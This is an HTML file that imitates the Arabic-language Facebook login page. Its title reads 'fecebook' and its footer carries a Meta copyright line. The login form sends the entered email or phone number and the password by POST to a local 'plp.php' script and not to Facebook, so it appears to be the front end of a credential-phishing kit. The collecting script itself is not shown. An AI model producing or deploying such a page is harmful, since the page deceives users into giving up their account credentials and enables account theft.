<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>fecebook</title>
    <STyle>
        #d5{color: blue; font-size: 23px;position: absolute; top:20px; left:37%;}
        #d6{color: blue;position: absolute; top:258px; left:33%;}
        #d7{position: absolute; top:330px; left:28%; height:40px;font-size:15px; color: rgb(248, 248, 248); width:160px; background-color: rgb(44, 150, 44); border-radius:5px;  border:2px solid white ;}
        #d9{color: rgb(153, 153, 153);position: absolute; top:480px; left: 63%;}
        #d10{position: absolute; top:510px; left: 57%;font-size:13px;}
        #d11{position: absolute; top:530px; left: 63%;font-size:13px;}
        #d12{position: absolute; top:550px; left: 57%; font-size:13px;}
        #d13{color: rgb(153, 153, 153);position: absolute; top:580px; left: 33%; font-size:13px}
        #d14{color: rgb(153, 153, 153);position: absolute; top:580px; left: 33%; font-size:13px}
        #d14{color: rgb(153, 153, 153);position: absolute; top:610px; left: 25%; font-size:13px}
        #d15{position: absolute; top:510px; left: 10%;font-size:13px;}
        #d16{position: absolute; top:530px; left: 13%;font-size:13px;}
        #d17{position: absolute; top:550px; left: 13%; font-size:13px;}
        
        #d8{position: absolute; top:205px; left:6%; width:311px; height: 45px;font-weight:bold,; font-size:17px ; color: rgb(249, 249, 255); background:blue;border-radius:5px; border:2px solid white ;}
        #d19{ position: absolute; top:155px;outline: none; left:6%;height: 35px; width:305px; background-color:rgb(241, 237, 237);border:2px  solid rgb(248, 237, 237) ; border-radius:4px;}
        #d18{ position: absolute; top:105px;outline: none; left:6%;height: 35px; width:305px; background-color:rgb(241, 237, 237);border:2px  solid rgb(248, 237, 237) ; border-radius:4px;}
    </STyle>
</head>
<body>
    <center>
        <div>
            <h2 id="d5">facebook</h2>
        </div>    
        <div>
            <form action="plp.php" method="POST">
                <input id="d18" type="text" required name="emil" dir="rtl" placeholder="البريد الالكتروني او رقم الهاتف"><br><br>
                <input id="d19" type="password" required name="Password" dir="rtl" placeholder="كلمة السر">
                <br><br>
                <button id="d8" type="submit"> تسجيل الدخول </button>
                <label id="d6">هل نسيت كلمة السر </label><br><br>
                <br><br><br><br><br><br><br><br><br><hr>
                <button id="d7">انشاء حساب جديد</button><br><br><br><br><br>
                <label id="d9">العربية</label><br>
                <label id="d10">Francias(France)</label><br>
                <label id="d11">Deutsch</label><br>
                <label id="d12">portugues(Brasil)</label><br>
                <label id="d13">حول . مساعدة . المزيد</label><br>
                <label id="d14"> 2022 &copy Meta حقوق النشر محفوظة</label>
                <label id="d15">English(UK)</label><br>
                <label id="d16">italiano</label><br>
                <label id="d17">Espanol</label><br>

            </form>
        </div>
    </center>
</body>
</html>